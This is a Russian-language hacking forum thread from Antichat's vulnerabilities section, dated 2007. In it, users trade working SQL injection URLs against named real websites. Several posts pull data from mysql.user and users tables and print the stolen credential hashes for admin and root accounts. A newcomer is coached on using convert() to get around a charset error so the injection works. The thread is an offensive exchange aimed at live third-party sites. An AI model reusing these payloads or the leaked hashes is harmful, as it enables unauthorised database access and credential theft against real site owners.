ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #901  
Старый 12.03.2007, 00:24
Аватар для n0ne
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Spyder, Китай любит тебя

Код:
http://www.hongkongnavi.com/shop/shop.php?id=-12+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105+from+mysql.user/*
 
Ответить с цитированием

  #902  
Старый 12.03.2007, 00:38
Аватар для n1†R0x
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Цитата:
Сообщение от n1†R0x  
Код:
http://www.maldives.ru/perday.php?hid=-1+union+select+1,2,3,concat(username,0x3a,password)+from+users/*
admin:$1$Urvg1Snr$L6uDyha6v7XY5wMophhrN.
в добавление:
Код:
http://azur.ru/gelendzhik/db.php?owner=282+and+282=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,AES_DECRYPT(AES_ENCRYPT(concat(user,0x3a,password),0x0),0x0),22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+mysql.user/*
root:*AB3D38951ECD62929CF96E60B677D0A5B1C08FCB

ps: +toxa+ молодец, исправил я тока написать хотел)
 
Ответить с цитированием

  #903  
Старый 12.03.2007, 00:47
Аватар для BlackCats
BlackCats
Постоянный
Регистрация: 01.02.2006
Сообщений: 970
Провел на форуме:
9254548

Репутация: 1942


По умолчанию

http://www.boyersteel.com/products.php?id=-4+union+select+1,convert(version()+using+latin1),3 ,4/*
 
Ответить с цитированием

  #904  
Старый 12.03.2007, 03:45
Аватар для ClonoX
ClonoX
Новичок
Регистрация: 23.12.2006
Сообщений: 14
Провел на форуме:
118220

Репутация: 29
По умолчанию

_http://kagul.ru/photooboy/index.php?action=detail&id=
самоя простя скула..


+видео по взлому сайта!
_http://rapidshare.com/files/20587714/bezpredel.rar.html я прсто ржал когда ломал его!!!

Последний раз редактировалось ClonoX; 12.03.2007 в 04:09..
 
Ответить с цитированием

  #905  
Старый 12.03.2007, 04:04
Аватар для }{0TT@БЬ)Ч
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от ClonoX  
_http://kagul.ru/photooboy/index.php?action=detail&id=
самоя простя скула..
+видео по взлому сайта!
_http://rapidshare.com/files/20587714/bezpredel.rar.html я прсто ржал когда ломал его!!!
лол ты где увидел там sql инъекцию ?
 
Ответить с цитированием

  #906  
Старый 12.03.2007, 04:27
Аватар для ClonoX
ClonoX
Новичок
Регистрация: 23.12.2006
Сообщений: 14
Провел на форуме:
118220

Репутация: 29
По умолчанию

Цитата:
Сообщение от }{0TT@БЬ)Ч  
лол ты где увидел там sql инъекцию ?
.. если ты про видео.. его там нет! просто прикольнуло... решыл с другими поделится... люблю я разработчиков таких сайтов!

+
http://www.es-loule.edu.pt/index.php?op=d2&grupo='PO'%20union+select/**/0,2,3,4,5,6,7,8,9/*
 
Ответить с цитированием

  #907  
Старый 12.03.2007, 05:09
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

Код:
http://www.fondsk.ru/article.php?id=-1+union+select+1,2,3,4,5,USER(),VERSION(),8,9,0,1,2,3,4,5,6,7,8,9,0,1/*
 
Ответить с цитированием

  #908  
Старый 12.03.2007, 06:21
Аватар для Horsekiller
Horsekiller
Познающий
Регистрация: 22.11.2006
Сообщений: 68
Провел на форуме:
682079

Репутация: 137
По умолчанию

Код:
http://www.yuretz.ru/prikol.php?id=-1+union+select+1,222,333,4,5,6,7,888,9,1,2,3/*
Первая скуль, поэтому на правах нуба задам вопросик:
вот выше я подобрал количество, но когда я делаю такой запрос:
Код:
http://www.yuretz.ru/prikol.php?id=-1+union+select+1,user(),333,4,5,6,7,888,9,1,2,3/*
получаю пинка
Цитата:
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
Понятно, что 2 несовместимых кодировки для юнион, но как с этим бороться?) Сорри если глупость.

Учебник по MySQL только начал курить)
 
Ответить с цитированием

  #909  
Старый 12.03.2007, 06:24
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

Цитата:
Сообщение от Horsekiller  
но как с этим бороться?) Сорри если глупость.

Учебник по MySQL только начал курить)
Просто нужно использовать конвертирование в нужную тебе кодировку... Как ты наверно заметил тебе нужна cp1251:
Код:
http://www.yuretz.ru/prikol.php?id=-1+union+select+1,convert(user()+using+cp1251),333,4,5,6,7,888,9,1,2,3/*
 
Ответить с цитированием

  #910  
Старый 12.03.2007, 07:28
Аватар для VampiRUS
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Horsekiller  
Код:
http://www.yuretz.ru/prikol.php?id=-1+union+select+1,222,333,4,5,6,7,888,9,1,2,3/*
Первая скуль, поэтому на правах нуба задам вопросик:
вот выше я подобрал количество, но когда я делаю такой запрос:
Код:
http://www.yuretz.ru/prikol.php?id=-1+union+select+1,user(),333,4,5,6,7,888,9,1,2,3/*
получаю пинка
Понятно, что 2 несовместимых кодировки для юнион, но как с этим бороться?) Сорри если глупость.

Учебник по MySQL только начал курить)
Я уже выкладывал

Код:
http://www.xmlhack.com/read.php?item=-1+union+select+1,2,3,4,5,6,7,8,TABLE_NAME,0,1+from+information_schema.tables/*

Последний раз редактировалось VampiRUS; 12.03.2007 в 07:37..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ